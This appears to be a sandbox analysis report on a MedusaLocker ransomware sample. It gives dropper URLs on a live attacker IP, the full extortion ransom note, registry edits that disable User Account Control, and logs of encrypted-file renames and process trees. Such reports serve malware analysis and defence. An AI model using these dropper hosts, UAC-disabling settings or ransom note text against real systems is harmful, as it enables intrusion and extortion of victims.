medusalocker | hxxp://95[.]213[.]145[.]101[:]8000/

Analysis

max time kernel
601s
max time network
603s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2022 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://95.213.145.101:8000/

Score

10^/10

medusalocker evasion ransomware spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://95.213.145.101/business/home.asp&ved=/_rp

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://95.213.145.101/uasclient/0.1.34/modules/_rp

Extracted

Path

C:\!-Recovery_Instructions-!.html

Ransom Note

<!DOCTYPE html> <html lang="en"> <head> <meta charset='utf-8'> <meta name='viewport' content='width=device-width,initial-scale=1'> <title></title> <style> html, body { background-color: #1a1a1a; } body { padding-top: 1rem !important; font-size: 1.3rem; color: white; } #text h2 { font-size: 2rem; font-weight: 600; line-height: 1.125; } .container { max-width: 1152px; flex-grow: 1; margin: 0 auto; position: relative; width: auto; } .box { background-color: #242424; display: block; padding: 1.25rem; border: 1px solid #303030; } a { color: #00b4d8; text-decoration: none; } a:hover { text-decoration: underline; } li { margin-bottom: 10px; } </style> </head> <body> <div class='container'> <div class='box'> <div id='text'> <h2>If you get this message, your network was hacked!</h2> <p>After we gained full access to your servers, we first downloaded a large amount of sensitive data and then encrypted all the data stored on them.</p> <p>That includes personal information on your clients, partners, your personnel, accounting documents, and other crucial files that are necessary for your company to work normally.</p> <p>We used modern complicated algorithms, so you or any recovery service will not be able to decrypt files without our help, wasting time on these attempts instead of negotiations can be fatal for your company.</p> <p>Make sure to act within <span style='color:#f4a261;'>72</span> hours or the negotiations will be considered failed!</p> <p>Inform your superior management about what's going on.</p> <p> Contact us for price and get decryption software.</p> <p> Contact us by email:<p> <h2>[email protected]</h2> </p>If you will get no answer within 24 hours contact us by our alternate emails:</p> <h2>[email protected]</h2> </p>To verify the possibility of the recovery of your files we can decrypted 1-3 file for free.</p> </p>Attach file to the letter (no more than 5Mb).</p> <h2>If you and us succeed the negotiations we will grant you:</h2> <ul> <li>complete confidentiality, we will keep in secret any information regarding to attack, your company will act as if nothing had happened.</li> <li>comprehensive information about vulnerabilities of your network and security report.</li> <li>software and instructions to decrypt all the data that was encrypted.</li> <li>all sensitive downloaded data will be permanently deleted from our cloud storage and we will provide an erasure log.</li> </ul> <h2>Our options if you act like nothing's happening, refuse to make a deal or fail the negotiations:</h2> <ul> <li>inform the media and independent journalists about what happened to your servers. To prove it we'll publish a chunk of private data that you should have ciphered if you care about potential breaches. Moreover, your company will inevitably take decent reputational loss which is hard to assess precisely.</li> <li>inform your clients, employees, partners by phone, e-mail, sms and social networks that you haven't prevent their data leakage. You will violate laws about private data protection.</li> <li>start DDOS attack on you website and infrastructures.</li> <li>personal data stored will be put on sale on the Darknet to find anyone interested to buy useful information regarding your company. It could be data mining agencies or your market competitors.</li> <li>publish all the discovered vulnerabilities found in your network, so anyone will do anything with it.</li> </ul> <h2>Why pay us?</h2> <p>We care about our reputation. You are welcome to google our cases up and be sure that we don't have a single case of failure to provide what we promissed.</p> <p>Turning this issue to a bug bounty will save your private information, reputation and will allow you to use the security report and avoid this kind of situations in future.</p> <h2>Your personal ID</p> 78D56A8A2E45EAE349EFB57210B7EBCBFFAE9AF4482E95502113CB03B931BB231043BC3F10007DE8A26638EF36CC4561E5BCB4A86DFF1C83D274618A04270C05<br>937936DDE3B51701FD13EE4E85E99ACB699A73EEF5B84269B835F349802DC6D1213242118E1D0ED8197419DC8517F248DB3FCBE3B7FCF4BAB2BF002FE407<br>2007F30EAAEE307EC26BBBBFF55382175E8BA616E41D451D441A2654C734572530C2E772272A71BA803B025B5F87E41C4F9FCA2A08D3237029A9FB8E25E5<br>E731F9C953900040B40E05E0FA7C84182321C090F0DDB2374B8770BB0C1C05C5D305F0C92820FF6F6CEB517AC339488B939372E7CAF514B1474A5BDF6B07<br>32A369D6DC589DB4DD9AE559F7F008CCE2BCBFFBD887939AFEF18150B2A8F20B00AB2038D78A0B6EB82A7D5153D420540D0BBAF34176C246115042D49A37<br>0EBFEE2CA4B556406F6AD094AD6E1D5D1EAD07E59424D33101EAECF7EF268E91166C5AC50DFA81E50A378C2603F59E8FB9623677694E01BA275014F619DD<br>B363D825423BF2C389636B40D99BF4594C433BA95C8DB54B103C8AD4182F3E004C2B11E9561C6C34CA0D1F1F8F74A45D92CEF2A9F4881D6FAE209C981F1A<br>E2E45430E325CAB74FAEB8D3E040DA0234136DC39C0E2DCFB1F039B09F4F15DE71FE66835D5FA21F6C4346C833695B079AA43D1316DD7F2F4801B852DBF7<br>A96BA90CE1431468CEBA3A3F973B

Emails

<h2>[email protected]</h2>

Signatures

MedusaLocker
Ransomware with several variants first seen in September 2019.
ransomware medusalocker

MedusaLocker payload 4 IoCs

resource	yara_rule
behavioral1/files/0x00090000000230c8-145.dat	family_medusalocker
behavioral1/files/0x00090000000230c8-146.dat	family_medusalocker
behavioral1/files/0x000a0000000230c0-150.dat	family_medusalocker
behavioral1/files/0x000a0000000230c0-151.dat	family_medusalocker

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	64ME_bul9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	64ME_bul9.exe

Blocklisted process makes network request 64 IoCs

flow	pid	Process
116	4228	powershell.exe
117	4228	powershell.exe
118	4228	powershell.exe
119	4228	powershell.exe
120	4392	powershell.exe
121	4228	powershell.exe
122	4228	powershell.exe
123	4228	powershell.exe
124	4228	powershell.exe
126	4228	powershell.exe
127	4228	powershell.exe
146	4228	powershell.exe
150	4228	powershell.exe
151	4228	powershell.exe
162	4228	powershell.exe
163	4228	powershell.exe
165	4228	powershell.exe
167	4228	powershell.exe
168	4228	powershell.exe
169	4228	powershell.exe
170	4228	powershell.exe
174	4228	powershell.exe
175	4228	powershell.exe
177	4228	powershell.exe
178	4228	powershell.exe
181	4228	powershell.exe
182	4228	powershell.exe
189	4228	powershell.exe
190	4228	powershell.exe
191	4228	powershell.exe
192	4228	powershell.exe
199	4228	powershell.exe
200	4228	powershell.exe
208	4228	powershell.exe
209	4228	powershell.exe
213	4228	powershell.exe
214	4228	powershell.exe
217	4228	powershell.exe
218	4228	powershell.exe
219	4228	powershell.exe
220	4228	powershell.exe
222	4228	powershell.exe
225	4228	powershell.exe
228	4228	powershell.exe
229	4228	powershell.exe
230	4228	powershell.exe
233	4228	powershell.exe
234	4228	powershell.exe
235	4228	powershell.exe
237	4228	powershell.exe
238	4228	powershell.exe
239	4228	powershell.exe
240	4228	powershell.exe
246	4228	powershell.exe
247	4228	powershell.exe
248	4228	powershell.exe
249	4228	powershell.exe
250	4228	powershell.exe
251	4228	powershell.exe
252	4228	powershell.exe
253	4228	powershell.exe
254	4228	powershell.exe
255	4228	powershell.exe
256	4228	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
816	64ME_bul9.exe
4656	svhost.exe
3840	ChromeRecovery.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\RegisterRename.raw => C:\Users\Admin\Pictures\RegisterRename.raw.bulwark9	64ME_bul9.exe
File renamed	C:\Users\Admin\Pictures\StartGrant.tif => C:\Users\Admin\Pictures\StartGrant.tif.bulwark9	64ME_bul9.exe
File renamed	C:\Users\Admin\Pictures\UpdateAssert.crw => C:\Users\Admin\Pictures\UpdateAssert.crw.bulwark9	64ME_bul9.exe
File renamed	C:\Users\Admin\Pictures\EditSearch.crw => C:\Users\Admin\Pictures\EditSearch.crw.bulwark9	64ME_bul9.exe
File renamed	C:\Users\Admin\Pictures\GrantExpand.raw => C:\Users\Admin\Pictures\GrantExpand.raw.bulwark9	64ME_bul9.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	64ME_bul9.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	\??\Z:\$RECYCLE.BIN\S-1-5-21-2891029575-1462575-1165213807-1000\desktop.ini	64ME_bul9.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	64ME_bul9.exe
File opened (read-only)	\??\L:	64ME_bul9.exe
File opened (read-only)	\??\N:	64ME_bul9.exe
File opened (read-only)	\??\P:	64ME_bul9.exe
File opened (read-only)	\??\A:	64ME_bul9.exe
File opened (read-only)	\??\G:	64ME_bul9.exe
File opened (read-only)	\??\Q:	64ME_bul9.exe
File opened (read-only)	\??\S:	64ME_bul9.exe
File opened (read-only)	\??\U:	64ME_bul9.exe
File opened (read-only)	\??\W:	64ME_bul9.exe
File opened (read-only)	\??\X:	64ME_bul9.exe
File opened (read-only)	\??\I:	64ME_bul9.exe
File opened (read-only)	\??\K:	64ME_bul9.exe
File opened (read-only)	\??\J:	64ME_bul9.exe
File opened (read-only)	\??\M:	64ME_bul9.exe
File opened (read-only)	\??\O:	64ME_bul9.exe
File opened (read-only)	\??\R:	64ME_bul9.exe
File opened (read-only)	\??\V:	64ME_bul9.exe
File opened (read-only)	\??\Y:	64ME_bul9.exe
File opened (read-only)	\??\B:	64ME_bul9.exe
File opened (read-only)	\??\E:	64ME_bul9.exe
File opened (read-only)	\??\Z:	64ME_bul9.exe
File opened (read-only)	\??\F:	64ME_bul9.exe
File opened (read-only)	\??\T:	64ME_bul9.exe

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\manifest.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\manifest.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\_metadata\verified_contents.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\ChromeRecoveryCRX.crx	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\ChromeRecovery.exe	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\ChromeRecovery.exe	elevation_service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1360	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5028	chrome.exe
5028	chrome.exe
5036	chrome.exe
5036	chrome.exe
4168	chrome.exe
4168	chrome.exe
3700	chrome.exe
3700	chrome.exe
3944	chrome.exe
3944	chrome.exe
1184	chrome.exe
1184	chrome.exe
2464	chrome.exe
2464	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
3856	chrome.exe
3856	chrome.exe
4068	chrome.exe
4068	chrome.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
3104	chrome.exe
3104	chrome.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4392	powershell.exe
4392	powershell.exe
4028	chrome.exe
4028	chrome.exe
4488	chrome.exe
4488	chrome.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe
816	64ME_bul9.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeIncreaseQuotaPrivilege	4652	wmic.exe
Token: SeSecurityPrivilege	4652	wmic.exe
Token: SeTakeOwnershipPrivilege	4652	wmic.exe
Token: SeLoadDriverPrivilege	4652	wmic.exe
Token: SeSystemProfilePrivilege	4652	wmic.exe
Token: SeSystemtimePrivilege	4652	wmic.exe
Token: SeProfSingleProcessPrivilege	4652	wmic.exe
Token: SeIncBasePriorityPrivilege	4652	wmic.exe
Token: SeCreatePagefilePrivilege	4652	wmic.exe
Token: SeBackupPrivilege	4652	wmic.exe
Token: SeRestorePrivilege	4652	wmic.exe
Token: SeShutdownPrivilege	4652	wmic.exe
Token: SeDebugPrivilege	4652	wmic.exe
Token: SeSystemEnvironmentPrivilege	4652	wmic.exe
Token: SeRemoteShutdownPrivilege	4652	wmic.exe
Token: SeUndockPrivilege	4652	wmic.exe
Token: SeManageVolumePrivilege	4652	wmic.exe
Token: 33	4652	wmic.exe
Token: 34	4652	wmic.exe
Token: 35	4652	wmic.exe
Token: 36	4652	wmic.exe
Token: SeIncreaseQuotaPrivilege	4564	wmic.exe
Token: SeSecurityPrivilege	4564	wmic.exe
Token: SeTakeOwnershipPrivilege	4564	wmic.exe
Token: SeLoadDriverPrivilege	4564	wmic.exe
Token: SeSystemProfilePrivilege	4564	wmic.exe
Token: SeSystemtimePrivilege	4564	wmic.exe
Token: SeProfSingleProcessPrivilege	4564	wmic.exe
Token: SeIncBasePriorityPrivilege	4564	wmic.exe
Token: SeCreatePagefilePrivilege	4564	wmic.exe
Token: SeBackupPrivilege	4564	wmic.exe
Token: SeRestorePrivilege	4564	wmic.exe
Token: SeShutdownPrivilege	4564	wmic.exe
Token: SeDebugPrivilege	4564	wmic.exe
Token: SeSystemEnvironmentPrivilege	4564	wmic.exe
Token: SeRemoteShutdownPrivilege	4564	wmic.exe
Token: SeUndockPrivilege	4564	wmic.exe
Token: SeManageVolumePrivilege	4564	wmic.exe
Token: 33	4564	wmic.exe
Token: 34	4564	wmic.exe
Token: 35	4564	wmic.exe
Token: 36	4564	wmic.exe
Token: SeIncreaseQuotaPrivilege	1276	wmic.exe
Token: SeSecurityPrivilege	1276	wmic.exe
Token: SeTakeOwnershipPrivilege	1276	wmic.exe
Token: SeLoadDriverPrivilege	1276	wmic.exe
Token: SeSystemProfilePrivilege	1276	wmic.exe
Token: SeSystemtimePrivilege	1276	wmic.exe
Token: SeProfSingleProcessPrivilege	1276	wmic.exe
Token: SeIncBasePriorityPrivilege	1276	wmic.exe
Token: SeCreatePagefilePrivilege	1276	wmic.exe
Token: SeBackupPrivilege	1276	wmic.exe
Token: SeRestorePrivilege	1276	wmic.exe
Token: SeShutdownPrivilege	1276	wmic.exe
Token: SeDebugPrivilege	1276	wmic.exe
Token: SeSystemEnvironmentPrivilege	1276	wmic.exe
Token: SeRemoteShutdownPrivilege	1276	wmic.exe
Token: SeUndockPrivilege	1276	wmic.exe
Token: SeManageVolumePrivilege	1276	wmic.exe
Token: 33	1276	wmic.exe
Token: 34	1276	wmic.exe
Token: 35	1276	wmic.exe

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe
5036	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5036 wrote to memory of 2124	5036	chrome.exe	81
PID 5036 wrote to memory of 2124	5036	chrome.exe	81
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 4664	5036	chrome.exe	84
PID 5036 wrote to memory of 5028	5036	chrome.exe	85
PID 5036 wrote to memory of 5028	5036	chrome.exe	85
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86
PID 5036 wrote to memory of 1508	5036	chrome.exe	86

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	64ME_bul9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	64ME_bul9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	64ME_bul9.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://95.213.145.101:8000/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff79944f50,0x7fff79944f60,0x7fff79944f70
  2⤵
  PID:2124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1700 /prefetch:2
  2⤵
  PID:4664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1952 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2372 /prefetch:8
  2⤵
  PID:1508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
  2⤵
  PID:4004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  PID:780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3640 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4468 /prefetch:8
  2⤵
  PID:4016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:8
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3944
- C:\Program Files\Google\Chrome\Application\chrome.exe
